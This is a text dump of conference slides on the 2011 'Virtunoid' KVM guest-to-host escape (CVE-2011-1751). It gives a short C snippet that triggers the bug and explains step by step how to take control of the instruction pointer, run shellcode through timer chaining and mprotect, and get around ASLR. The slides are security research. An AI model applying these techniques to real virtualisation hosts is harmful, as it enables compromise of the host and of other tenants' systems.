540 likes | 667 Views
Virtunoid : Breaking out of KVM. Nelson Elhage Black Hat USA 2011. Outline. Introduction Related work Background K nowledge Attack Detailed CVE 2011-1751 Bug Detailed Exploit Detailed (Take Control of %rip) Inject Shellcode into host Disable non executable page Bypassing ASLR
E N D
Virtunoid: Breaking out of KVM Nelson Elhage Black Hat USA 2011
Outline • Introduction • Related work • Background Knowledge • Attack Detailed • CVE 2011-1751 Bug Detailed • Exploit Detailed (Take Control of %rip) • Inject Shellcode into host • Disable non executable page • Bypassing ASLR • Conclusions • Reference
Introduction • It was found that the PIIX4 Power Management emulation layer in qemu-kvmdid not properly check for hot plug eligibility during device removals. A privileged guest user could use this flaw to crash the guest or, possibly, execute arbitrary code on the host. (CVE-2011-1751)
QEMU-KVM Background Knowledge • a generic and open source machine emulator and virtualizer. • Three components: • Kvm.ko • Kvm-intel.ko or kvm-amd.ko • Qemu-kvm
Kvm.ko[3] • The core KVM kernel module • Provides ioctls for communicating the kernel module • Primarily responsible for emulating the virtual CPU and MMU • Emulates a few devices in-kernel for efficiency • Contains an emulator for a subset of x86 used in handling certain traps
Kvm-intel.ko/kvm-amd.ko • Provides support for Intel’s VMX and AMD’s SVM virtualization extensions • Relatively small compared to the rest of KVM
Qemu-kvm • Provides the most direct user interface to KVM • Based on the classic x86 emulator • Implements the bulk of the virtual devices a VM uses • Implements a wide variety of possible devices and buses • An order of magnitude more code than the kernel module
QEMUTimer (qemu_src/qemu_common.h) • Static QEMUTimer *active_timers[QEMU_NUM_CLOCKS] • StructQEMUTimer{ QEMUClock *clock; int64_t expire_time; QEMUTimerCB *cb; /* call back function*/ void *opaque; /* parameter */ structQEMUTimer *next; /* link list */ }
QEMUTimer Active_timers QEMUTimer
QEMUTimer(qemu_src/vl.c) • Related functions: • Qemu_new_timer: allocate a memory region for the new timer. • Qemu_mod_timer: modify the current timer add it to link list. • Qemu_run_timers: loop through the link list and execute the timer structure call back function with the opaque as the parameter
QEMUTimer(qemu_src/vl.c) • The main_loop_wait function will iterate through the active_timers and call qemu_run_timers()
Real Time Clock • A computer clock that keep track of the current time • MC146818 RTC hardware manual can be found • http://wiki.qemu.org/File:MC146818AS.pdf
Real Time Clock Emulations [2] • RTCState structure StructRTCState { ….. QEMUTimer *second_timer; QEMUTimer *second_timer2; }
Real Time Clock Emulations • Related functions: • Rtc_initfn : initialize the RTC • Rtc_update_second : update the expire time of the QEMUTimer and add it to the link list.
Real Time Clock Emulations • rtc_initfn : RTCState *s = …. s->second_timer = qemu_new_timer(rtc_clock, rtc_updated_second, s) s->second_timer2 = qemu_new_timer(rtc_clock, rtc_update_second2, s) qemu_mod_timer(s->second_timer2, s->next_second_time)
RTCState and QEMUTimer Active_timer ……… Rtc_update_second ………. ……….. ………. ………. ……….. ………. Cb opaque QEMUTimer Next Second_timer Cb opaque Second_timer2 QEMUTimer Next RTCState Rtc_update_second2
PIIX 4 • A south bridge chip. • Default south bridge chip used by qemu-kvm • Include ACPI, PCI-ISA, and an embeded MC146818 RTC. • Support PCI device hotplug, write values to IO port 0xae08 • Qemu use qdev_free to emulate device hotplug. • Certain devices don’t support device hotplug but qemu didn’t check this.
PCI-ISA hot plug • It should not be possible to unplug the ISA bridge • KVM’s emulated RTC is not designed to be unplugged.
Bug Detailed Did not check The device can Be unplug or not
Being dealloc Add the second timer to link list.
Bug reproducer • #include <sys/io.h> • Int main(){ • iopl(3); • outl(2, 0xae08); • return 0; • }
Unplug RTC Active_timer ……… QEMUTimer ………. ……….. ………. Rtc_update_second Cb Cb opaque opaque Next Next Second_timer QEMUTimer RTCState
Unplug RTC Active_timer QEMUTimer ………. ……….. ………. Rtc_update_second Cb Cb opaque opaque Next Next Second_timer QEMUTimer …… …… …… RTCState Dummy memory region
Return to main_loop_wait Call qemu_run_timers Active_timer QEMUTimer ………. ……….. ………. Rtc_update_second Cb Cb opaque opaque Next Next Second_timer QEMUTimer …… …… …… RTCState Dummy memory region
QEMUTimer call back Rtc_update_second(opaque) Active_timer QEMUTimer ………. ……….. ………. Rtc_update_second Cb Cb opaque opaque Next Next Second_timer QEMUTimer …… …… …… RTCState Dummy memory region
Next Main_loop_wait Active_timer QEMUTimer ………. ……….. ………. Rtc_update_second Cb Cb opaque opaque Next Next Second_timer QEMUTimer …… …… …… RTCState Dummy memory region
Exploit Detailed ( Take Control of %rip) • 1. Inject a Controlled QEMUTimer into qemu-kvm • 2. Eject ISA bridge • 3. Force an allocation into the freed RTCState, with second timer point to our fake QEMUTimer
Inject a Fake QEMUTimer • The guest RAM is backed by mmap()ed region inside the qemu-kvm process. • Allocate in the guest RAM and calculate the the host address by the following formula: • Hva = physmem_base + gpa • gpa = page_traslation(gva) <= linux kernel project 1 • Gva = guest virtual address • Gpa = guest physical address • Hva = host virtual address • Physmem_base = mmap start region • For now assume we know physmem_base(no aslr)
Force allocation into the freed RTCState • Force qemu to call malloc • Utilize the qemu-kvm user-mode networking stack • Qemu-kvm implement DHCP server, DNS server and NAT gateway in user-mode networking stack • User-mode stack normally handle packets synchronously • To prevent recursion, if a second packet is emitted while handling a first packet, the second packet is queued using malloc. • ICMP ping.
Putting it together • 1. Allocate a Fake QEMUTimer • 2. calculate the Fake timer address • 3. unplug ISA bridge • 4. ping the gateway containing pointers to your fake timer.
Allocate Fake QMEUTimer Active_timer ……… Rtc_update_second QEMUTimer ………. ……….. ………. ………. ……….. ………. Cb Cb Cb opaque opaque opaque Next Next Next Evil function (Shellcode) Second_timer QEMUTimer Fake QEMUTimer RTCState
Unplug ISA bridge Active_timer Ping the gateway Rtc_update_second QEMUTimer ………. ……….. ………. ………. ……….. ………. Cb Cb Cb opaque opaque opaque Next Next Next Second_timer Evil function (Shellcode) QEMUTimer Fake QEMUTimer RTCState
First Main_loop_wait Active_timer Rtc_update_second QEMUTimer ………. ……….. ………. ………. ……….. ………. Cb Cb Cb opaque opaque opaque Next Next Next Second_timer Evil function (Shellcode) QEMUTimer Fake QEMUTimer RTCState
Second Main_loop_wait Active_timer QEMUTimer ………. ……….. ………. Cb Cb opaque opaque Next Next Second_timer Evil function (Shellcode) Fake QEMUTimer RTCState
What’s Next • 1. we have %rip control • 2. Where is the Evil function • Inject shellcode to host virtual memory • Host virtual memory has page protection(NX bit) • 3. Solutions: • A. ROP • B. something clever
Multiple QEMUTimer Chaining • 1. we can control the QEMUTimer data structure. • 2. create multiple QEMUTimer object and chain them together. ………. ……….. ………. ………. ……….. ………. ………. ……….. ………. Cb Cb Cb opaque opaque opaque QEMUTimer Next Next Next F1(X) F2(Y) F3(Z)
Multiple QEMUTimer Chaining • We now have multiple on argument function calls. • We want to do more arguments function calls. For example, mprotecttake three arguments.
System V AMD64 ABI [7] • Arguments of types Bool, char, short, int, long, long long, and pointers are in the INTEGER class. • If the class is INTEGER, the next available register of the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9 is used • More detailed check out the reference 7
Multiple QEMUTimer Chaining • Suppose we can find a function with the following property. • Let f1(x) be set_rsi • %rsi register will not be modified during qemu_run_timer() in most qemu version. • Therefore, F2(y) becomes F2(y,x) since we control the %rsi from f1(x) Set_rsi: movl %rdi, %rsi; return
Set_rsi for QEMUTimer Chaining • This function will copy its first parameter to the second parameter of ioport_write • %rdi is the first parameter and %rsi is the second parameter. Therefore we get a function with the previous property. (Movl %rdi, %rsi) Void cpu_outl(pio_addr_taddr, uint32_t val) { ioport_write(2, addr, val);}
Mprotect for QEMUTimer Chaining • Mprotect prototype: • Mprotect(addr, lens, prot) • PROT_EXEC = 4 • Use the following function • We control the “opaque/ioport” by QEMUTimer and control the “addr” by set_rsi() • Seems like we control everything in this function
Putting it All Together • Allocate a fake IORangeOps with • fake_ops->read = mprotect • Allocate a page-aligned IORange with • Fake_ioport->ops = fake_ops • Fake_ioport->base = -PAGE_SIZE • Copy shellcode following the IORange • Construct a timer chain that calls • Cpu_outl(0, *) • Ioport_readl_thunk(fake_ioport, 0) • Fake_ioport + 1
mprotect QEMUTimer Chain ……. ……. ……. Cb Cb Cb ops Read opaque opaque opaque Next Next Next ……. ……. ……. ……. ……. ……. Fill with shellcode IORangeOps Cpu_outl Ioport_readl_thunk IORange (PAGE_ALIGN)
Address • The base address of the qemu-kvm binary, to find code address(such as mprotect ….) • Physmem_base, the address of the physical memory mapping inside kvm • Solutions: • Find an information leak • Assume non-PIE. Every major distribution compile qemu-kvm as non position independent executable. • How about physmem_base
Fw_cfg • Emulated IO ports 0x510 (address) and 0x511 (data) • Used to communicate various tables to the qemu BIOS (e820 map, ACPI tables, etc) • Also provides support for exporting writable tables to the BIOS • However, fw_cfg_writedoesn’t check if the target table is supposed to be writable
Static data • Several fw_cfg areas are backed by statically-allocated buffers. • Net result: nearly 500 writable bytes inside static variables.